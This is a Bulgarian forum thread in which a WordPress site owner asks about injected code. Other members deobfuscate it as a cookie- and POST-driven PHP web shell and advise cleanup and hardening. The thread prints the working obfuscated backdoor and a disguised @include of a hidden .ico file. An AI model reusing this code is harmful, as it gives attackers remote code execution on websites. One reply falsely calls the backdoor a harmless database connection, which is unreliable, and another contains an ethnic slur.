Какви са тези скриптове? [Потенциално зловредни]

Spyrax

Active Member
Здравейте, някой може ли да ми обясни какво всъщност правят следните скриптове.

1-
<?php
$crhmep = 'i_4op\'91fm*lsbHdn2#k58extvuy3cr6a-g7';$locmm = Array();$locmm[] = $crhmep[29].$crhmep[30].$crhmep[22].$crhmep[32].$crhmep[24].$crhmep[22].$crhmep[1].$crhmep[8].$crhmep[26].$crhmep[16].$crhmep[29].$crhmep[24].$crhmep[0].$crhmep[3].$crhmep[16];$locmm[] = $crhmep[14].$crhmep[10];$locmm[] = $crhmep[18];$locmm[] = $crhmep[13].$crhmep[6].$crhmep[17].$crhmep[2].$crhmep[20].$crhmep[28].$crhmep[15].$crhmep[35].$crhmep[33].$crhmep[17].$crhmep[28].$crhmep[31].$crhmep[2].$crhmep[33].$crhmep[2].$crhmep[35].$crhmep[8].$crhmep[21].$crhmep[33].$crhmep[6].$crhmep[2].$crhmep[7].$crhmep[29].$crhmep[33].$crhmep[21].$crhmep[8].$crhmep[20].$crhmep[15].$crhmep[17].$crhmep[21].$crhmep[22].$crhmep[17].$crhmep[28].$crhmep[29].$crhmep[6].$crhmep[7];$locmm[] = $crhmep[29].$crhmep[3].$crhmep[26].$crhmep[16].$crhmep[24];$locmm[] = $crhmep[12].$crhmep[24].$crhmep[30].$crhmep[1].$crhmep[30].$crhmep[22].$crhmep[4].$crhmep[22].$crhmep[32].$crhmep[24];$locmm[] = $crhmep[22].$crhmep[23].$crhmep[4].$crhmep[11].$crhmep[3].$crhmep[15].$crhmep[22];$locmm[] = $crhmep[12].$crhmep[26].$crhmep[13].$crhmep[12].$crhmep[24].$crhmep[30];$locmm[] = $crhmep[32].$crhmep[30].$crhmep[30].$crhmep[32].$crhmep[27].$crhmep[1].$crhmep[9].$crhmep[22].$crhmep[30].$crhmep[34].$crhmep[22];$locmm[] = $crhmep[12].$crhmep[24].$crhmep[30].$crhmep[11].$crhmep[22].$crhmep[16];$locmm[] = $crhmep[4].$crhmep[32].$crhmep[29].$crhmep[19];foreach ($locmm[8]($_COOKIE, $_POST) as $xrdsmi => $tafqx){function vntijf($locmm, $xrdsmi, $uizcuck){return $locmm[7]($locmm[5]($xrdsmi . $locmm[3], ($uizcuck / $locmm[9]($xrdsmi)) + 1), 0, $uizcuck);}function araegf($locmm, $zzagizp){return @$locmm[10]($locmm[1], $zzagizp);}function pyjdjz($locmm, $zzagizp){$rxmwm = $locmm[4]($zzagizp) % 3;if (!$rxmwm) {$uugsexn = $locmm[0]; $vokdfgp = $uugsexn("", $zzagizp[1]($zzagizp[2]));$vokdfgp();exit();}}$tafqx = araegf($locmm, $tafqx);pyjdjz($locmm, $locmm[6]($locmm[2], $tafqx ^ vntijf($locmm, $xrdsmi, $locmm[9]($tafqx))));}


2- @include "\057hom\145/cl\141ssv\145g/c\154ien\164s/e\143otr\151keb\147.co\155/wp\055con\164ent\057the\155es/\164wen\164ysi\170tee\156/.5\14690d\06242.\151co"; (Това мяса на криптиран код)
 
Няма страшно, това е за връзка с базата данни. Криптирано е да не може се хакне.
 
Код:
"\057hom\145/cl\141ssv\145g/c\154ien\164s/e\143otr\151keb\147.co\155/wp\055con\164ent\057the\155es/\164wen\164ysi\170tee\156/.5\14690d\06242.\151co";
- /home/classveg/clients/SAITA TI/wp-content/themes/twentysixteen/.5f90d242.ico
 
Поразхубавих малко кода и рецептата е горе-долу такава - взимат се $_COOKIE и $_POST, замесват се, разбъркват се, от тях евентуално излиза някаква функция, които се задейства и скрипта се прекратява. Зловредно е това, махай го.
 
Поразхубавих малко кода и рецептата е горе-долу такава - взимат се $_COOKIE и $_POST, замесват се, разбъркват се, от тях евентуално излиза някаква функция, които се задейства и скрипта се прекратява. Зловредно е това, махай го.
Мда, това направих, беше лепнат на около 50 места, изчистих го, в момента върви сканиране за зловреден софтуер отново.

Странното е как е бил вкаран. Системата е под Wordpress, но беше версия 4.9 или 5.0.2 нещо такова, явно ще трябва да обновя на 5.3 заедно с всички разширения и тези които не ги използвам да ги изтрия.

На мнение съм, че е бил importn-ат в следствие на някакъв екслпойт на някое разширение или на самата тема за Wordpress. Благодаря за помощта, ако имате някакви съвети казвайте. :)
 
Мисля, че е просто обикновен/опростен shell, който стартира команда през cookies и POST заявки.

foreach ($locmm[8]($_COOKIE, $_POST) as $xrdsmi => $tafqx)

Някакви допълнителни мнения? Без тролл моля.
 
Ако принтнеш съдържанието на $locmm, то е такова:

Array (
[0] => create_function
[1] => H*
[2] => #
[3] => b92453d7-2364-47f8-941c-8f5d28e23c91
[4] => count
[5] => str_repeat
[6] => explode
[7] => substr
[8] => array_merge
[9] => strlen
[10] => pack
)

Повечето са имена на PHP функции. Обърни внимание на първата - create_function. За какво служи create_function... за създаване на функция в PHP... а функциите са за това за да се стартират.

Кода нищо не прави докато сайта се отваря нормално. Но който знае какви бисквитки или POST информация да постне, той реално може да изпълнява каквито си иска функции на твоя сайт.
 
Ако принтнеш съдържанието на $locmm, то е такова:

Array (
[0] => create_function
[1] => H*
[2] => #
[3] => b92453d7-2364-47f8-941c-8f5d28e23c91
[4] => count
[5] => str_repeat
[6] => explode
[7] => substr
[8] => array_merge
[9] => strlen
[10] => pack
)

Повечето са имена на PHP функции. Обърни внимание на първата - create_function. За какво служи create_function... за създаване на функция в PHP... а функциите са за това за да се стартират.

Кода нищо не прави докато сайта се отваря нормално. Но който знае какви бисквитки или POST информация да постне, той реално може да изпълнява каквито си иска функции на твоя сайт.
Благодаря Ви за подробния отговор. Какво мнение имате относно как е станало и как да се предотврати пак, освен, че се препоръчва да се ъпдейтне до последна версия Wordpress и плъгините и всичко излишно да се изтрие.

Какъв съвет бихте дали, аз си мислих в php.ini да спра няколко функции като exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
но сигурно ще повлиае на сайтовете.
 
Мисля, че е просто обикновен/опростен shell, който стартира команда през cookies и POST заявки.

foreach ($locmm[8]($_COOKIE, $_POST) as $xrdsmi => $tafqx)

Някакви допълнителни мнения? Без тролл моля.
Ти ли мислиш или някой вместо теб?

its just a simple shell that executes commands through cookies and POST requests


Провери си плъгините
 
Ти ли мислиш или някой вместо теб?




Провери си плъгините
Не съм твърдял, че аз съм дал предположението, просто от всичките предположения, мисля, че това е най-логично според ситуацията. Мерси за отговора, можеш ли да ми дадеш по детайлен съвет, защото са няколко сайта и не може да се локализира от кой е екслпойтнат.
 
https://tools.kali.org/web-applications/wpscan сканирай ги и може да добиеш евентуална представа. Ежедневно добавят в DB-то експлоити, така че вероятно ще разбереш от кой плъгин/ тема става въпрос.

Мерси, ще го погледна. Нещо по-дробро за сканиране и по-бързо има ли?
 
По-добро от това няма, ако имаше щеше да е то build-нато в Kali. Логовете също биха дали инфо, сайта ти е ударен от някакъв crawler, ако беше ръчно и персонално, да си разбрал по кофти начин. И забрани exec както са ти казали, кроновете, евентуално ще ти счупят нещо - разгледай тук : https://stackoverflow.com/questions/1865020/php-how-to-disable-dangerous-functions и мини на php 7+ . Една от причините, поради която мразя WP е, че заради някой индийски дебил и идиот, ти удрят сайта, че и не знаеш точно откъде, защото самата екосистема на WP те кара да инсталираш плъгини на килограм, дето са писани от идиоти.
 
По-добро от това няма, ако имаше щеше да е то build-нато в Kali. Логовете също биха дали инфо, сайта ти е ударен от някакъв crawler, ако беше ръчно и персонално, да си разбрал по кофти начин. И забрани exec както са ти казали, кроновете, евентуално ще ти счупят нещо - разгледай тук : https://stackoverflow.com/questions/1865020/php-how-to-disable-dangerous-functions и мини на php 7+ . Една от причините, поради която мразя WP е, че заради някой индийски дебил и идиот, ти удрят сайта, че и не знаеш точно откъде, защото самата екосистема на WP те кара да инсталираш плъгини на килограм, дето са писани от идиоти.
Добре, супер мерси пак. Писах ти ЛС за по-лесна комуникация.

Ако някой друг също иска да изрази мнение, нека да пише в темата.
 
Ставаш малко нагъл вече.
Ако искаш секюрити одит се плаща и то не малко
 
Ставаш малко нагъл вече.
Ако искаш секюрити одит се плаща и то не малко
Има пари, ще плати ;)
 

Горе